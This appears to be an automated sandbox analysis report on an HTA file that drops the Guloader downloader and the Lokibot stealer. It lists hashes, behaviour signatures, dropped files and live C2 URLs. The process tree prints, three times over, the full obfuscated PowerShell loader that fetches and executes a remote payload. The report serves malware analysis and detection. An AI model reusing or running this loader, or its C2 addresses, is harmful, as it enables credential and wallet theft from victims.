Analysis

  • max time kernel
    145s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-09-2024 11:07

General

  • Target

    LV24-0926.hta

  • Size

    7KB

  • MD5

    b604a446f056b778a22cf7ea6a6676ae

  • SHA1

    c198b474688cc106f9fc06cc6b9e569613f5e689

  • SHA256

    3023bc189f377a809d054529454fa9e35af817f3c9c3646c15d2d4da468676bf

  • SHA512

    4f54f91862b9fe8494cefbca8dae42cc930839206508fae41e0d3688b12a5e7bafa1eb0da6369daaa77af6db62cac02360b217a1a090a904b3a2720cdd6edd4e

  • SSDEEP

    192:hlN6ZVy2gAkJkhRg9e+UEmOVYpUVM2vy6n2MbIv:hqZVy2COhDNG1v9LIv

Malware Config

Extracted

Family

lokibot

C2

http://168.100.10.152/index.php/wp.php?view=1

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\LV24-0926.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4412
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
      2⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3452
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4108
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Blitzlampers Kandiderede Placebo Flammeskrene Preliability #>;$smaabyens='Dentigerous';<#Finalismes Parallelforskydningen Turbeth #>;$Proformadisposition=$host.PrivateData;If ($Proformadisposition) {$Landssviger++;}function Oxalurate($Epicheiremata){$Firlingefdslers=$naggin+$Epicheiremata.Length-$Landssviger;for( $stapediform=3;$stapediform -lt $Firlingefdslers;$stapediform+=4){$sandjorden+=$Epicheiremata[$stapediform];}$sandjorden;}function Diplomatical($Drivhjulene){ . ($Dowery) ($Drivhjulene);}$Autophthalmoscope=Oxalurate 'NymM .eo T zUdgiscul K,lFriache/Col5ple.j t0 s, Con( iW oniBrunPicds co PswC.asOpe PorNlnuT i Ilk1A,f0Unc. re0Res; R. LagWDusiItenRec6Fin4 fs;Ek. Mi.xInd6.ks4Tj ; j KvrrHidv D :Pak1sp,2Eff1 Mo. Mo0ko )sto HjlG ose recslukFugoUds/Ana2 Bu0Not1 Ca0Is 0Fas1Tan0Eer1Tal BekF s i.ggrHemeForfsprosedx ip/ si1Fib2Dis1 Al.Fly0 ag ';$Rosebuds=Oxalurate 'skauuncsOpve NorDr.-pr,A hg,oleUnaN syt up ';$Untranquillise=Oxalurate 'PlahCertDrut Glp E sTen:Kul/Bio/ redshirFiriForvB gesuc.UnagEl,oDi oLingH.llUnee st.s fc aloAn mbar/stous bcsce?sljekryxsilpOcto rirTumt re= apdWraoDinwNa n anlforoVaraFi,d Di&su,iKrodIri=Vej1modZDi.5 B dBedXst.tPtePMenVKonzG uu ndW n1sanB In8 aQPro9IsclDil6 GiLTa MHagcDu 8VesFBlerMalasinrVa,opigZMe ZRepR s,JslaAResGCir ';$Hyphantria=Oxalurate ' .e> D. ';$Dowery=Oxalurate '.usi DiEsp x.ko ';$Pantningernes='Astigmatisers';$Rankernes='\Relativitetsteoriernes.Ove';Diplomatical (Oxalurate 'Fr $Ef g F ls,rostobi daB plBus:VanV .eis blNakj sle shsAnstFrey erPerkPraePr,nE,h=Pa $ MueFl,n Buvspl:Vi aVagpNonp Cyd.anaFdst,dlasyc+C n$ForR,heaVedn d kDisesparM.xnRoueTe.ssi. ');Diplomatical (Oxalurate 'Hje$ChrgForlV go subTilas nlBes:DjaBKono stn NonMisoT br T = B,$Me UNonnUnttRufr Uga rknOarq.onuelfiL.cl ktlCh i UpsForePar.LoksMenpKopl rivartcon(Rai$ ChHOveystap DehAppasunnCeltUrbrB eiPenaKlu)spa ');Diplomatical (Oxalurate 'Lsb[,erNDemeaantBis.E csRi,e UnrCavvKleiGenc Une InP AfoMu.iPh npretXenM.ysa nfnUnda prg Cle KorWtl]Baj: an:BumsIndeDemc Deu BlrFodiRidtHa yLgeP PorMato Mut iaoD ecOveoGarlOve pa= Ri ,al[.owNEsseIndtsv .sposG.ieK,nc esuP,lrUn iA ot .oyBeaPstorVa.oKryt MeoBedc FloPsel AdTI jyVurpUdseK,a]bru:Gif: nTstal MosTar1C,r2Tre ');$Untranquillise=$Bonnor[0];$torpedobaaden=(Oxalurate ' .e$s rgFlul EdORadbPaaaCreLUn :snosOtsN L iG,oFLeaFspeeDes=RumnOu,E DiWF r- skoNatb CoJ MoeWelCTerTThe GysPa YM nsN nT ecECl MLe..supnNicEs eT Im. P WR.aespab P cDoslH oIBarE,ueNVertBnk ');Diplomatical ($torpedobaaden);Diplomatical (Oxalurate 'Hag$MyesVksnHoli refManfUncePor. neHUdee JoaBood s,eEscr rks e[ An$PenR veoNonsProeHeab puanfdanns yo] ud=Red$disABliuknat rooValpProh TitK,mhsk aN,nlIngmD boUndsH,rcGiaoFolpPlue lo ');$Undergrundsbevgelsers=Oxalurate 'Aff$Bohst onfrei icfPrif,seeOss. oDf,soT nw sanHa.l Hao uaPredDigFRediDenlNoneGol(U g$Pa UJannmust Jvr hya sunTysq,aau MyiseclPodl RoiFa sHoveNiu,Bru$AtlUbumnAssf deo HerForm spaBretMortPyreWeadpar) ol ';$Unformatted=$Viljestyrken;Diplomatical (Oxalurate 'Cap$ChaGBiblTr oindb ,oaskrlR d:UmbcGraA nmRComDknoB etohanAU eRsamd De=sub(FirT speunss moTcam-UngpJanask tsphh r sk $Andu amnDomF KaODogRRabMCemaH aTUnitUnve LodRu ) s, ');while (!$Cardboard) {Diplomatical (Oxalurate 'Cot$CongUnpl.iroChebs aaProlHuc:PriRscriAr nFiog trlBesiEnkkl.destu= tr$ MetOphrsk u aseKon ') ;Diplomatical $Undergrundsbevgelsers;Diplomatical (Oxalurate 'Ravs fbtHisa CarDe.t.ar-HvisErhlMa.eAbue Hip sm P 4For ');Diplomatical (Oxalurate 's n$snegstrl unoCatb ruamaglMi,: ,nC eaeskr RedAfdbTubo GeaFrerHjed,qu=Pr (AkkTPlueTensOpstUnd-PenPGlaa,rotsy hEst Tek$ H.UAfdnFodfsa.oTilrToamEu,aUnptstatBrieAtodPro)Im ') ;Diplomatical (Oxalurate 'Com$ sogsp.l kioDelb pra,esldi :stiV Paaselg sca NobTomosman Add hieA tn we=Pha$Effg Cal C.o.rob laastrl.al:BroTOp i dilK.ym nva ata Gel.id+Qua+B a%Ely$stjB UnoOrdnBevnConomo,rO,f.MiccComoTapusern stt Do ') ;$Untranquillise=$Bonnor[$Vagabonden];}$rerriges=321203;$Galactogenetic=29403;Diplomatical (Oxalurate 'Un $ProgPrelv loB hbUnda Yal O :EnaT ibibe.dEnaeUndbsqun scnfeneFlonTrasKur slu=Ilp Pe G une UntHja- oCNavo RenObst Ude ern,rstBo, Moo$TauUbruns,ufMalobarrordmNata Emt,rvtFileAk dGui ');Diplomatical (Oxalurate 'Wa.$Helg.unlAfsos nb roaDatlT i:BesHJysyd,cdRimrO,eoChasF ae exptadaAarrEx asubtsubiI fo TonTu, Mel=Bru Het[QuisH,py I sOpttsabeG em st.PlaCRe oLi nVenvVine,ssrAratUge]Akv:Non:Ov F.rdrGa,oEwimR.jBNonaPhas doeMag6s.l4Pros Qut Bor F iBelnComgsek(s l$Tr TLaniKl.dH re R bUdgnHaenBrieTannAndssal)La ');Diplomatical (Oxalurate 'Glo$ BagKnulBoroepib,loaIdol Tj: stePrep uniKarcGrsu sorsk.estu Bl= N, La[Pu,sDamyLimsDuct VieTromKvi.sinT Bie ixDe,t Vu.,olEPernMeicG doNu dFemiBlonA.tgTol] N,:Den:UdmAD ns KeC erIPolI ,a.Un G BueLeut Tis Iltre rGariH xnN lg n(Can$BanH dyma,dTrarKreoh rsAlleCesp aaBulr shaHyptLapip noFainsyl)Ryg ');Diplomatical (Oxalurate 'Una$CirgMakl Roou,ebOpeaMetl Ra:PokMA.geunetUnsaFinfDeio nrUndeb rrA,pnBo,eReps Mi=Fyr$BloeId,ps mi .ycAnru C r ieHy . ans JiuBa bFresHyptOr.rDiuistrnFolgPhy(,ag$RefrphoeValr ncrUnai.upg,aleBl sscr,Fa,$MacGOpsaOaklIriaRefc,aat L,osupgAntesknnDore vitKaniUmics a)R o ');Diplomatical $Metaforernes;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:8
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\syswow64\msiexec.exe"
      2⤵
        PID:1900
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\syswow64\msiexec.exe"
        2⤵
        • Blocklisted process makes network request
        • Accesses Microsoft Outlook profiles
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:3320

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      25604a2821749d30ca35877a7669dff9

      SHA1

      49c624275363c7b6768452db6868f8100aa967be

      SHA256

      7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

      SHA512

      206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      19KB

      MD5

      412e69e9700f5bf203b1f125c32740c3

      SHA1

      80d1d859129f48a407d58587eea942549d1dfcef

      SHA256

      d2420a066b71579c1a8806b703f07bd26ab5016d31aaa1d38b42bee95f622707

      SHA512

      0684e22f63231255a05ea263a0bd98f3920390b162389ac24eca4beb5eeab82f82f558bf67815629019b080b4b2dd17e793622fc19b72289493e3ff8fb5ef830

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      7b729b76807ea4216b633128f80dfded

      SHA1

      0affad81c35b6870bb7a8753be50c5b28551f922

      SHA256

      af667295e8d9d0582c76b18f6f4665bf6f22d0693cb36e55c5d31d6fa99f48cc

      SHA512

      3eddd456de350c50b9f18a259af572167f47afb28f42968ba716e9aa8c0d07d65fa5fcbeda1057f3382532bc04e0675c336a901c6c497ddcae5778d7c2ba8fb3

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4er4rbrc.znp.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1194130065-3471212556-1656947724-1000\0f5007522459c86e95ffcc62f32308f1_a53bb4ca-6113-48bb-9609-441860fdd0d7

      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1194130065-3471212556-1656947724-1000\0f5007522459c86e95ffcc62f32308f1_a53bb4ca-6113-48bb-9609-441860fdd0d7

      Filesize

      46B

      MD5

      c07225d4e7d01d31042965f048728a0a

      SHA1

      69d70b340fd9f44c89adb9a2278df84faa9906b7

      SHA256

      8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

      SHA512

      23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    • C:\Users\Admin\AppData\Roaming\Relativitetsteoriernes.Ove

      Filesize

      456KB

      MD5

      4720451553542bd139f9545c55cb3004

      SHA1

      8368cf6dd617edd586bd689124d6fd6ed7764268

      SHA256

      8a0447898832d6e21f1b1037a28eaa2ebd3cdc4f2a49b9971d52c60eb01cf38f

      SHA512

      215bd65fb55ce03cc1300821645813e754cf05956e1ee8f30e657d86aa4ee707f2cfb0c6bc6818c115e168595bd3239cdce97b723ba970e4ecaf90580bcf3df4

    • memory/8-59-0x0000000008D00000-0x000000000BEFA000-memory.dmp

      Filesize

      50.0MB

    • memory/8-57-0x0000000005DB0000-0x0000000006104000-memory.dmp

      Filesize

      3.3MB

    • memory/3320-76-0x0000000001200000-0x00000000043FA000-memory.dmp

      Filesize

      50.0MB

    • memory/3320-73-0x0000000000400000-0x00000000005E4000-memory.dmp

      Filesize

      1.9MB

    • memory/3452-19-0x00000000069D0000-0x0000000006A1C000-memory.dmp

      Filesize

      304KB

    • memory/3452-2-0x0000000070D50000-0x0000000071500000-memory.dmp

      Filesize

      7.7MB

    • memory/3452-21-0x0000000006F50000-0x0000000006F6A000-memory.dmp

      Filesize

      104KB

    • memory/3452-28-0x0000000070D50000-0x0000000071500000-memory.dmp

      Filesize

      7.7MB

